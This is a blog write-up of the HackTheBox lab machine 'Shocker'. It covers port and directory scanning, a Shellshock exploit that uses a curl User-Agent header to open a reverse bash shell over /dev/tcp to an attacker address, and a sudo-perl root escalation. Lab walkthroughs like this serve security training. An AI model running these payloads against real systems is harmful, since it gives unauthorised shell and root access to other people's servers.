Reece Russell

Shocker

  • Jun 13, 2023

Shocker is an easy machine on HackTheBox where you can exploit the shellshock vulnerability.

[RECON]

$ nmap -sC -sV 10.10.10.56
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-13 13:07 BST
Nmap scan report for 10.10.10.56
Host is up (0.025s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4f8ade8f80477decf150d630a187e49 (RSA)
|   256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_  256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.23 seconds

The Nmap scan showed that there was a webserver on port 80, this is what the website looked like:

At first glance there is really nothing on this website at all, so I loaded up Gobuster to find any hidden directories.

$ gobuster dir -u 10.10.10.56 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/06/13 13:37:50 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/cgi-bin/             (Status: 403) [Size: 294]
/index.html           (Status: 200) [Size: 137]
/server-status        (Status: 403) [Size: 299]
Progress: 4484 / 4615 (97.16%)
===============================================================
2023/06/13 13:37:59 Finished
===============================================================

The Gobuster results shows the /cgi-bin/ folder which holds scripts that interact with the web browser. There is also a pretty well known vulnerability with this folder called Shellshock. With the name of the box being Shocker, it’s pretty obvious that this is the vulnerability we need to exploit. For this I need to find what scripts are in the /cgi-bin/ directory:

$ gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              sh
[+] Timeout:                 10s
===============================================================
2023/06/13 13:48:09 Starting gobuster in directory enumeration mode
===============================================================
/user.sh              (Status: 200) [Size: 119]
Progress: 4307 / 441122 (0.98%)^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2023/06/13 13:48:21 Finished
===============================================================

[USER ACCESS]

Now that we have found the user.sh script, we can exploit the Shellshock vulnerability. It is a remote command injection vulnerability in bash. This is a pretty old vulnerability and so there is a vast amount of documentation on how to exploit it online so it is not too difficult to find a payload for it.

$ curl -i -H "User-agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.2/4444 0>&1" http://10.10.10.56/cgi-bin/user.sh

Using this command along with a simple netcat listener gets you user access pretty easily.

From here you can find the user flag.

[ROOT ACCESS]

With user access, the first thing to look for is your sudo privileges with the command ‘sudo -l’:

shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

From these results, it shows that we can run the Perl binary as root and so looking at GTFObins we can find a payload to escalate our privileges.

shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";'
sudo perl -e 'exec "/bin/sh";'
whoami
root

With that we have root, now you can find that root.txt flag!

Search